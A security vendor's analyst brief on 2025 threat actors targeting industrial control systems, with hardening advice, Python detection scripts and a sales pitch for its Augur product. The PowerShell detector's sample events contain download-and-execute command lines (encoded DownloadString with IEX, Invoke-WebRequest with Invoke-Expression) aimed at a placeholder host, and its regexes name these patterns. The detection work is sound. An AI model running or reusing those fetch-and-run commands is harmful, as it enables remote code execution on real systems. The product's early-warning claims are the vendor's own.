2025 Analyst Brief: Critical Infrastructure Threat Actors

Threat Research Team

Key Takeaways

  • Ransomware and APT overlap is growing as state-sponsored actors increasingly disguise infrastructure pre-positioning campaigns as data extortion operations.
  • Middle Eastern ICS systems experience 1.8× higher infection rates than the global average, driven by weak segmentation and outdated firmware.
  • Targeted OT vulnerabilities include Trimble Cityworks (CVE-2025-0994) and Windows zero-click flaws exploited by Chinese APTs.
  • Hacktivism-as-cover remains a major attribution challenge, as numerous “grassroots” OT defacement campaigns in 2025 are now tied to military cyber units.

Introduction

This report provides an analytical overview of industrial control system (ICS) and operational technology (OT) threat activity observed throughout 2025. The year marked an evolution in adversary objectives, with a focus on pre-positioning and maintaining access over immediate disruption. Both state-aligned and financially motivated actors expanded campaigns targeting ICS and supervisory control and data acquisition (SCADA) networks, exploiting blurred boundaries between IT and OT environments.

The report consolidates findings from government advisories (notably CISA and DOE), vendor telemetry (Mandiant, Dragos, Unit 42, CrowdStrike), and open threat exchanges. It highlights cross-sector targeting in utilities, water, oil and gas, and transportation, as well as the industrial supply chain dependencies that bridge these critical systems. The report also examines how proxy infrastructures, FRP-based tunneling, and hybrid ransomware-APT tradecraft have become defining hallmarks of 2025 operations.

State-Aligned Actors

Volt Typhoon

Volt Typhoon continued to execute low-and-slow reconnaissance and access-maintenance operations against U.S. critical infrastructure, particularly in the electric, water, and transportation sectors. The actor’s focus on persistence rather than disruption indicates a strategic posture of operational readiness. Telemetry from Unit 42, CISA, and Microsoft identified Volt Typhoon’s use of Fast Reverse Proxy (FRP) tooling, PowerShell-based living-off-the-land scripts, and compromised SOHO routers for ingress. Activity logs revealed FRP sessions enumerating administrative panels, jump hosts, and management networks, suggesting preparatory mapping for lateral movement into OT zones.

APT41 / Mission 2025

APT41 sustained multi-vector intrusions into engineering firms, manufacturing supply chains, and software vendors. Distinct from Volt Typhoon, APT41’s operations focused on intellectual property exfiltration targeting proprietary designs, firmware, and build pipelines critical to industrial production. The group relied on cloud-based redirectors, serverless API endpoints, and multi-stage implants that blended espionage and cybercrime TTPs. Public analyses showed a preference for long-term access retention through credential theft and exploitation of developer toolchains, aligning with broader Chinese objectives of strategic technological acquisition.

Sandworm / APT44

Sandworm reaffirmed its position as the most operationally capable and destructive ICS actor. While most destructive incidents remained within the Ukrainian theater, Sandworm’s tradecraft and malware development continued to shape global ICS security models. Research from Mandiant, ESET, and Google’s Mandiant Threat Response documented new variants of Industroyer2 and CaddyWiper, both of which align with historical grid-targeting operations. Sandworm’s continued integration of ICS protocol manipulation and system-level wipers illustrates its enduring capacity for real-world disruption, making it the benchmark for destructive OT operations worldwide.

Iran-linked Clusters (CyberAv3ngers, MuddyWater, APT35, Nimbus Manticore)

Iranian threat clusters intensified campaigns against water utilities, oil & gas infrastructure, and engineering contractors across the Middle East, with spillover into U.S. supply chains. Analyses from CISA and Dragos identified phishing-driven credential theft, compromise of exposed PLC interfaces, and unauthorized HMI access as recurring entry vectors. These activities demonstrate growing Iranian proficiency in OT reconnaissance, coupled with opportunistic attacks against exposed industrial assets. Some incidents leveraged legitimate remote access software to maintain persistence, further blurring the boundary between espionage and sabotage.

Ransomware and Crime Groups Targeting Industrial Sectors

Cl0p

Cl0p remained the dominant industrial ransomware operator in 2025, exploiting high-impact vulnerabilities in enterprise systems that bridge IT and OT. Reports from Honeywell and multiple CERTs documented Cl0p’s selective encryption strategy, which targeted engineering datasets, project archives, and OT network documentation, while avoiding the immediate disruption of control systems. Campaigns exploiting MOVEit Transfer and Oracle E-Business Suite (CVE-2025-61882) highlighted the group’s rapid weaponization of newly disclosed vulnerabilities. Cl0p’s continued reliance on data theft and extortion rather than full encryption represents a trend toward covert monetization in critical infrastructure environments.

Qilin, Gunra, Anubis

These ransomware collectives, identified by Dragos in Q2 2025, exemplify the convergence of criminal and APT methodologies. Targeting engineering firms, construction vendors, and utilities, they maintained persistent access for weeks before initiating encryption or data theft. The actors’ operational tempo and tool selection mirrored state-sponsored approaches leveraging custom loaders, FRP tunnels, and reconnaissance of OT-adjacent networks. This blending of financially motivated and state-aligned tradecraft highlights the increasing difficulty in distinguishing between espionage and extortion in industrial contexts.

Observed Infrastructure and Tradecraft Patterns

Actors across ecosystems standardized on multi-hop proxy chains, Go-based loaders, and reverse-tunneling frameworks (FRP, Chisel, SSH) to obscure C2 paths. Initial access continues to rely heavily on phishing, VPN exploitation, and compromised cloud assets. Once inside, adversaries pivot using harvested SSO tokens, PsExec, and WMI, with persistence often anchored in custom services or scheduled tasks. ICS-specific reconnaissance typically involves enumeration of Modbus TCP, DNP3, and OPC UA endpoints, revealing ongoing efforts to map industrial networks rather than disrupt them directly. Detection remains weakest at the embedded controller and edge device layer, where limited logging and proprietary protocols impede visibility.

Augur Insights

Augur consistently uncovers malicious infrastructure long before it becomes visible to the broader industry, and it has been particularly effective at identifying threat actors targeting ICS and OT systems months, and in some cases years, before their public reporting.

For example, Augur detected IP 91.149.241[.]103, later linked to APT41, on October 12, 2022, well before its industry disclosure on January 7, 2025. Similarly, IP 31.192.107[.]144, now attributed to Qilin, was first flagged by Augur on October 16, 2018, years prior to its industry recognition on July 31, 2025.

Recommendations

1) Network & Perimeter Controls

  1. Adopt preemptive cybersecurity tools such as Augur to bolster traditional Detection and Response ahead of first attacks and reduce alert noise in the SOC
  2. Block and log known reverse-tunnel protocols and anomalous outbound ports
    • Enforce an egress allowlist; block uncommon outbound ports (8080/8443/8043) from OT segments and non-proxy hosts. Monitor TLS sessions on non-standard ports and multiplexed TLS connections.
  3. DNS and TLS inspection
    • Enforce recursive DNS logging + passive DNS; inspect/TLS-terminate outbound flows (where policy allows) to detect domain fronting, cloud redirector C2, and rapid hostname churn.
  4. Restrict direct internet access from OT/ICS subnets
    • Only allow approved jump hosts in DMZ; no direct internet from PLCs/HMI; use strictly controlled application proxies for remote vendor access.
  5. Detect multi-hop proxying
    • Alert on internal hosts initiating persistent outbound connections that correlate with inbound connections to the same host (sign of reverse tunnel). Instrument flow logs and use session correlation.
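The two flow-log checks above (the egress allowlist for OT segments and non-proxy hosts, and the session correlation that surfaces a reverse tunnel) can be expressed as a small script. The following is an added example written for this brief, not Augur's code: the flow records are constructed NetFlow-style tuples, and the address ranges, approved proxy, allowlisted port and the 10-minute "persistent session" threshold are assumptions. It treats a reverse tunnel as a long-lived outbound session on one of the uncommon ports named above, during which the same host starts new connections to other internal hosts.

```python
"""Flow-log checks for OT egress violations and reverse-tunnel behaviour.

Added illustration for this brief, not Augur's code. Flow records are
constructed NetFlow-style tuples; the address ranges, approved proxy,
allowlisted port and thresholds are assumptions for the example.
"""
from ipaddress import ip_address, ip_network

OT_SEGMENTS = [ip_network("10.50.0.0/16")]      # assumed OT/ICS address space
INTERNAL = [ip_network("10.0.0.0/8")]           # assumed internal address space
APPROVED_PROXIES = {"10.10.1.5"}                # assumed DMZ application proxy / jump host
ALLOWED_EGRESS_PORTS = {443}                    # assumed egress allowlist for non-OT hosts
TUNNEL_PORTS = {8080, 8443, 8043}               # uncommon outbound ports named in the brief
LONG_SESSION_SECS = 600                         # assumed: "persistent" means >= 10 minutes

# Constructed flow records: (start_ts, src, dst, dst_port, duration_secs)
FLOWS = [
    (1000, "10.50.3.7", "203.0.113.10", 8443, 7200),  # OT host holds a 2 h session on a tunnel port
    (1300, "10.50.3.7", "10.50.3.20", 502, 2),         # ...and then reaches PLCs on Modbus
    (1310, "10.50.3.7", "10.50.3.21", 502, 2),
    (1320, "10.50.3.7", "10.20.0.9", 3389, 30),        # ...and an IT host over RDP
    (2000, "10.10.1.5", "203.0.113.50", 443, 15),      # approved proxy, ordinary HTTPS
    (2100, "10.20.0.9", "198.51.100.4", 443, 12),      # ordinary short HTTPS from IT
    (2200, "10.20.0.9", "10.20.0.10", 445, 5),         # internal SMB, not egress
]


def in_any(ip, networks):
    return any(ip_address(ip) in net for net in networks)


def egress_violations(flows):
    """Flows the egress allowlist should have blocked: any external traffic
    from OT segments, and traffic from non-proxy hosts to ports outside the
    allowlist."""
    violations = []
    for _ts, src, dst, dport, _dur in flows:
        if in_any(dst, INTERNAL):
            continue                                  # not egress
        if in_any(src, OT_SEGMENTS):
            violations.append((src, dst, dport))       # OT must not reach the internet directly
        elif src not in APPROVED_PROXIES and dport not in ALLOWED_EGRESS_PORTS:
            violations.append((src, dst, dport))
    return violations


def reverse_tunnel_candidates(flows):
    """A long-lived outbound session to a tunnel port, during which the same
    host starts connections to other internal hosts: the pattern a reverse
    tunnel leaves in flow logs when an operator pivots through it."""
    candidates = []
    for ts, src, dst, dport, dur in flows:
        if in_any(dst, INTERNAL) or dur < LONG_SESSION_SECS or dport not in TUNNEL_PORTS:
            continue
        session_end = ts + dur
        lateral = sorted({d for t, s, d, _p, _d in flows
                          if s == src and in_any(d, INTERNAL) and ts <= t <= session_end})
        if lateral:
            candidates.append({"host": src, "tunnel_peer": f"{dst}:{dport}",
                               "session_secs": dur, "lateral_targets": lateral})
    return candidates


if __name__ == "__main__":
    for v in egress_violations(FLOWS):
        print("EGRESS VIOLATION", v)
    for c in reverse_tunnel_candidates(FLOWS):
        print("REVERSE TUNNEL?", c)
```

On the constructed data the OT host's 2-hour session on 8443 is both an allowlist violation and a tunnel candidate, because it fans out to two PLCs and an IT host while the session is open; the proxy's ordinary HTTPS and the IT host's short sessions are not flagged. In production the same logic runs over exported flow records, and the thresholds are tuned to the site's baseline.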

2) Endpoint & Host Hardening

  1. Block living-off-the-land misuse
    • Harden PowerShell/WMIC/PsExec: enable script logging, ConstrainedLanguageMode where possible, and block encoded/remote PowerShell. Log command-line and module loads.
  2. EDR posture
    • Ensure EDR can detect FRP binaries, suspicious process parents, and scripts that spawn networking utilities. Deploy host-level allowlisting for critical OT/engineering workstations.
  3. Protect SOHO/remote routers
    • Inventory any customer/vendor-managed routers; require vendor attestations and minimum baseline configs: disable remote admin, require strong credentials, firmware up-to-date, and remote-access via VPN into jump hosts only.
  4. Credential hygiene
    • Enforce MFA everywhere (including vendor/remote access), rotation of service account keys, and limit local admin use. Monitor for abnormal SSO token usage and token-based lateral movement.

3) Cloud, DevOps & Toolchain Protections

  1. CI/CD and artifact protection
    • Enforce role separation: developers vs build service vs deploy. Use ephemeral build agents, sign artifacts, protect artifact repositories (Nexus/Artifactory), and log all artifact pulls/pushes.
  2. Monitor developer tooling and cloud projects
    • Inventory cloud projects, service accounts, and public cloud resources. Detect creation of suspicious serverless functions, unusual IAM role grants, or outbound connections from build runners to uncommon hosts.
  3. Hardening recommendations
    • Enforce least privilege for service accounts, require OIDC/short-lived credentials for CI, lock down webhooks, and monitor pipeline logs for exfil signals (large artifact transfers to unknown endpoints).
  4. Incident control
    • Create a “compromised CI playbook”: rotate secrets, revoke CI tokens, rebuild pipelines on known-good images, and require artifact re-signing.

4) OT & ICS-Specific Controls

  1. Increase telemetry at the edge
    • Add packet capture or full-session logging for OT gateways. Instrument Zeek (formerly Bro) or Suricata at the OT/IT boundary. Capture Modbus/DNP3/OPC UA requests and alert on unexpected enumerations.
  2. Segmentation & microsegmentation
    • Strict zone enforcement: Management networks are separated from control networks; prohibit lateral SMB/WinRM/PsExec traffic across zones.
  3. Read-only monitoring for controllers
    • Where possible, use passive taps or read-only OPC UA proxies to minimize the impact on controllers while still gaining visibility.
  4. Detection examples for ICS recon
    • Alert on large numbers of function code reads, abnormal register scans, and repeated HMI session enumeration in short windows.
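The ICS recon detections listed in item 4 (bursts of read function codes, register scans, and enumeration of many unit IDs in a short window) are shown below over a constructed Modbus/TCP request log. This is an added example written for this brief, not Augur's code or a Dragos/Zeek signature: the record layout, the legitimate-HMI and recon-host addresses, and the thresholds are assumptions; only the read function codes 1 through 4 are standard Modbus.

```python
"""Modbus/TCP reconnaissance detection over a request log.

Added illustration for this brief, not Augur's code. The log format,
thresholds and addresses are constructed assumptions; the read function
codes (1-4) are the standard Modbus ones.
"""
from collections import defaultdict, deque

READ_FUNCTIONS = {1, 2, 3, 4}   # read coils / discrete inputs / holding regs / input regs
BURST_THRESHOLD = 20            # assumed: reads per source inside one window
WINDOW_SECS = 10
SWEEP_MIN_ADDRS = 8             # assumed: distinct start addresses before calling it a scan
ENUM_MIN_UNITS = 5              # assumed: distinct unit IDs probed before calling it enumeration


def parse_line(line):
    """Constructed record layout: 'ts src unit_id function_code start_addr count'."""
    ts, src, unit, fc, addr, count = line.split()
    return int(ts), src, int(unit), int(fc), int(addr), int(count)


def constructed_log():
    lines = []
    # Legitimate HMI: polls the same holding-register block once per second for 30 s.
    for i in range(30):
        lines.append(f"{1000 + i} 10.50.1.10 1 3 0 10")
    # Recon host: sweeps start addresses 0..1100 in steps of 100, four requests per second.
    for i in range(12):
        lines.append(f"{1040 + i // 4} 10.50.3.7 1 3 {i * 100} 10")
    # Recon host: probes unit IDs 1..8 at address 0 to find live devices.
    for unit in range(1, 9):
        lines.append(f"{1044 + unit // 4} 10.50.3.7 {unit} 4 0 1")
    return lines


def detect_read_bursts(reqs):
    """Sources exceeding BURST_THRESHOLD reads within any WINDOW_SECS window
    (sliding window per source; records must be time-ordered per source)."""
    recent = defaultdict(deque)
    flagged = set()
    for ts, src, _unit, fc, _addr, _count in reqs:
        if fc not in READ_FUNCTIONS:
            continue
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > WINDOW_SECS:
            q.popleft()
        if len(q) >= BURST_THRESHOLD:
            flagged.add(src)
    return sorted(flagged)


def detect_register_sweeps(reqs):
    """(src, unit) pairs whose reads touch many distinct start addresses."""
    addrs = defaultdict(set)
    for _ts, src, unit, fc, addr, _count in reqs:
        if fc in READ_FUNCTIONS:
            addrs[(src, unit)].add(addr)
    return sorted(k for k, a in addrs.items() if len(a) >= SWEEP_MIN_ADDRS)


def detect_unit_enumeration(reqs):
    """Sources that address unusually many unit IDs."""
    units = defaultdict(set)
    for _ts, src, unit, _fc, _addr, _count in reqs:
        units[src].add(unit)
    return sorted(s for s, u in units.items() if len(u) >= ENUM_MIN_UNITS)


def run(lines):
    reqs = [parse_line(line) for line in lines]
    return {"bursts": detect_read_bursts(reqs),
            "sweeps": detect_register_sweeps(reqs),
            "unit_enumeration": detect_unit_enumeration(reqs)}


if __name__ == "__main__":
    print(run(constructed_log()))
```

The HMI's steady one-read-per-second polling of a single block never trips any rule, while the recon host is caught three ways: 20 reads inside a 10-second window, 12 distinct start addresses on one unit, and 8 unit IDs probed from one source. The same three counters apply to DNP3 or OPC UA browse requests with the function-code set swapped.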

5) Detection & Hunting Playbook

A) Living-off-the-land PowerShell / WMI abuse

  • Alert on PowerShell with encoded commands, download-file + invoke-expression chains, or unusual parent process (e.g., mshta -> powershell). Log full command line, module loads, and network I/O following those processes.
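A minimal implementation of rule A over process-creation telemetry follows. It is an added example written for this brief, not Augur's code: the events are constructed Sysmon-style records, the list of suspicious parent processes and the regular expressions are assumptions to be tuned against a site baseline, and `example.invalid` is a reserved, non-resolving hostname. The one non-obvious step is decoding `-EncodedCommand` payloads (base64 of UTF-16LE text) so that the download-plus-invoke check runs against what would actually execute rather than against the opaque blob.

```python
"""Detection of living-off-the-land PowerShell abuse in process-creation events.

Added illustration for this brief, not Augur's code. Events are constructed
Sysmon-style records; the parent list and regexes are assumptions a team
would tune to its own baseline.
"""
import base64
import re

POWERSHELL = {"powershell.exe", "pwsh.exe"}
SUSPICIOUS_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe",
                      "winword.exe", "excel.exe", "outlook.exe"}

# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob; -ExecutionPolicy does not match.
ENCODED = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncoded\w*)?\s+([A-Za-z0-9+/=]{16,})")
DOWNLOAD = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient")
INVOKE = re.compile(r"(?i)\biex\b|invoke-expression")


def basename(path):
    """Last path component, Windows or POSIX separators, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def decode_encoded_command(token):
    """PowerShell -EncodedCommand payloads are base64 of UTF-16LE text."""
    try:
        return base64.b64decode(token).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Return the list of rule names the event trips (empty if benign)."""
    if basename(event["image"]) not in POWERSHELL:
        return []
    findings = []
    parent = basename(event["parent_image"])
    if parent in SUSPICIOUS_PARENTS:
        findings.append(f"suspicious parent {parent}")
    cmd = event["command_line"]
    text = cmd
    m = ENCODED.search(cmd)
    if m:
        findings.append("encoded command")
        decoded = decode_encoded_command(m.group(1))
        if decoded:
            text = decoded                      # inspect what actually runs, not the blob
    if DOWNLOAD.search(text) and INVOKE.search(text):
        findings.append("download + invoke-expression chain")
    return findings


def encode_for_sample(script):
    """Helper used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed events (example.invalid is a reserved, non-resolving name).
EVENTS = [
    {"pid": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-Service"},
    {"pid": 2, "parent_image": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_for_sample(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")},
    {"pid": 3, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -c "Invoke-WebRequest http://example.invalid/x -OutFile t.ps1; '
                     'Invoke-Expression (Get-Content t.ps1 -Raw)"'},
    {"pid": 4, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]


def triage(events):
    """Map pid -> findings for every event that tripped at least one rule."""
    results = {}
    for ev in events:
        findings = analyze(ev)
        if findings:
            results[ev["pid"]] = findings
    return results


if __name__ == "__main__":
    for pid, findings in triage(EVENTS).items():
        print(pid, findings)
```

The benign administrative invocation (pid 1) produces no findings, which matters because `-ExecutionPolicy` would be a false positive for a naive `-e` match. Pid 2 trips all three rules only because the encoded payload is decoded first; with script block logging enabled (item 1 of the host hardening section) the same text also appears in event 4104 without any decoding.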

B) Cloud redirector / serverless C2 detection

  • Alert on new serverless functions exposing outbound network to irregular endpoints, or sudden spikes in API Gateway responses to unknown IPs.
  • Monitor for ephemeral public IP addresses used by customer cloud projects and correlate them with suspicious DNS registrations.

C) Ransomware / Exfil staging detection

  • Alert on large archive creation of engineering directories, access to project archives followed by uncommon outbound transfers (S3 buckets, unregistered domains, or multi-part uploads). Track unusual use of Oracle EBS endpoints or file transfer utilities after privilege escalations.
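Rule C is a sequence correlation rather than a single-event match: an archive staged from an engineering location, then an upload of comparable size from the same host to a destination outside the allowlist. The script below implements that correlation as an added example written for this brief, not Augur's code; the EDR- and proxy-style events, the engineering paths, the destination allowlist, the 500 MB archive floor, the one-hour window and the "upload at least half the archive size" ratio are all assumptions to tune per environment.

```python
"""Correlating archive staging in engineering shares with unusual outbound transfers.

Added illustration for this brief, not Augur's code. Events are constructed
EDR/proxy-style records; the paths, domain allowlist, size thresholds and
window are assumptions to tune per environment.
"""
from collections import defaultdict

ENGINEERING_PATHS = ("d:\\projects\\", "\\\\fileserver\\engineering\\")   # assumed staging sources
ARCHIVE_EXTENSIONS = (".zip", ".7z", ".rar", ".tar.gz")
MIN_ARCHIVE_BYTES = 500 * 1024 * 1024          # assumed: ignore small archives
KNOWN_GOOD_DESTINATIONS = {"backup.corp.example", "artifacts.corp.example"}  # assumed allowlist
WINDOW_SECS = 3600                             # assumed: transfer within an hour of staging
MIN_UPLOAD_RATIO = 0.5                         # assumed: upload at least half the archive size

# Constructed events: file_create from EDR, net_out from proxy/flow logs. Sizes in bytes.
EVENTS = [
    {"ts": 32400, "host": "ENG-WS-07", "type": "net_out", "dest": "backup.corp.example",
     "bytes_out": 5_000_000_000, "multipart": False},           # nightly backup, allowlisted
    {"ts": 36000, "host": "ENG-WS-07", "type": "file_create", "process": "7z.exe",
     "path": r"D:\Projects\SubstationA\export.7z", "bytes": 2_100_000_000},
    {"ts": 37200, "host": "ENG-WS-07", "type": "net_out", "dest": "cdn-sync-3.example.net",
     "bytes_out": 2_050_000_000, "multipart": True},            # 20 min later, unknown host
    {"ts": 39600, "host": "ENG-WS-02", "type": "file_create", "process": "explorer.exe",
     "path": r"D:\Projects\Rev\photos.zip", "bytes": 20_000_000},  # small, below the floor
    {"ts": 39700, "host": "ENG-WS-02", "type": "net_out", "dest": "mail.corp.example",
     "bytes_out": 19_000_000, "multipart": False},
]


def is_staged_archive(ev):
    """Large archive written under an engineering path."""
    if ev["type"] != "file_create":
        return False
    path = ev["path"].lower()
    return (path.endswith(ARCHIVE_EXTENSIONS)
            and path.startswith(ENGINEERING_PATHS)
            and ev["bytes"] >= MIN_ARCHIVE_BYTES)


def detect_exfil_staging(events):
    """Archive staged from an engineering location, then an upload of comparable
    size from the same host to a destination outside the allowlist within WINDOW_SECS."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host[ev["host"]].append(ev)
    alerts = []
    for host, evs in by_host.items():
        for i, ev in enumerate(evs):
            if not is_staged_archive(ev):
                continue
            for later in evs[i + 1:]:
                if later["ts"] - ev["ts"] > WINDOW_SECS:
                    break                              # events are time-ordered per host
                if (later["type"] == "net_out"
                        and later["dest"] not in KNOWN_GOOD_DESTINATIONS
                        and later["bytes_out"] >= MIN_UPLOAD_RATIO * ev["bytes"]):
                    alerts.append({"host": host, "archive": ev["path"], "process": ev["process"],
                                   "dest": later["dest"], "bytes_out": later["bytes_out"],
                                   "multipart": later["multipart"],
                                   "lag_secs": later["ts"] - ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_exfil_staging(EVENTS):
        print("EXFIL STAGING?", alert)
```

Only ENG-WS-07 alerts: the 5 GB transfer to the backup server is allowlisted and precedes the archive anyway, and ENG-WS-02's 20 MB zip never clears the size floor. Carrying the `multipart` flag and the staging process name into the alert gives the responder the two facts the playbook asks for first: whether this looks like a chunked cloud upload, and which tool built the archive.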

6) Response & Recovery

  1. Incident playbooks by scenario
    • Reverse-tunnel detection playbook, developer-toolchain compromise playbook, and OT intrusion playbook. Each must list containment steps, evidence collection, vendor engagement, and legal/regulatory notifications.
  2. Forensics readiness
    • Ensure full packet captures at perimeter and key chokepoints are available for at least 30 days, and that endpoint EDR telemetry (process, network, file hashes) is retained and immutable during incident response.
  3. Backups & air gapping
    • For engineering and OT documentation, enforce immutable backups, offline copies, and limits on administrative access to backup systems.
  4. Controlled disclosure & law enforcement coordination
    • Pre-establish contacts at CISA, local CERTs, and law enforcement. Have a trusted third-party for forensic validation.

Sources

China-Linked Threats (Volt Typhoon, APT41, Mission 2025)

Russia-Linked Threats (Sandworm / APT44)

Iran-Linked Threats (MuddyWater, APT35, Nimbus Manticore, CyberAv3ngers)

Ransomware & Criminal Ecosystem (Cl0p, Qilin, Anubis, Industrial Crime)

OT / ICS Threat Landscape & Broader Industrial Reports

The Augur Difference. Let Us Prove It To You.

Experience firsthand the benefits of preemptive cyber defense with a quick proof of value (POV). We can have you up and running in less than a day, and after 30 days, get an Augur report detailing:

  • Threats Augur identified
  • Advance warning timelines
  • Data-driven insight on alert reduction and improved SOC efficiency
